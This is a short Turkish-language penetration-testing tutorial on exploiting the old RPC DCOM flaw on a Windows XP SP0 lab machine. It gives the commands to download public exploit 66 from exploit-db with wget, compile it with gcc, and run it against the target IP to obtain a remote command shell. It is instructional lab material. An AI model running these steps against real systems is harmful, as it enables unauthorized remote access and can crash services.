İstismar işleminin gerçekleştirileceği ortamın genel özellikleri aşağıdaki gibi listelenebilir:
- Saldırı yapılacak kurban bilgisayarın işletim sistemi: Windows XP SP0
- Kurban bilgisayarda istismar edilecek zafiyet: Microsoft Windows (RPC DCOM) Remote Exploit
- Kurban bilgisayarın IP adresi: 192.168.153.131
- Zafiyet istismarı için kullanılacak olan kodun yazıldığı dil: C
- Zafiyet istismarı için kullanılacak olan kodun bulunacağı site: www.exploit-db.com
İstismarı gerçekleştirmeden önce C kodu bulunması gerekmektedir. İstismar kodu, Exploit Database sayfasındaki Search bağlantısından aranır.
Kullanılabilecek istismar kodu elde edilir:
İstismar kodu “Exploit Code” bağlantısından indirilerek veya metin alanındaki kod parçacıklarından kopyalanarak saldırgana ait Kali bilgisayara indirilir.
wget https://www.exploit-db.com/download/66 -O 66.c
C kodunun derlenir ve hangi parametreleri istediği listelenir.
ls -la
gcc 66.c -o ExploitXP
ls -la
./ExploitXP -h
İstismar işlemi için kurban bilgisayarın IP değeri ve işletim sistemi belirtilir. Böylece hedef sistemin Windows komut satırı elde edilir:
./ExploitXP 5 192.168.153.131
Uyarı: Bazı durumlarda istenmeyen sonuçlar (Mavi ekran hatası, servislerin devre dışı kalması gibi) da doğabileceği göz önünde bulunmalıdır.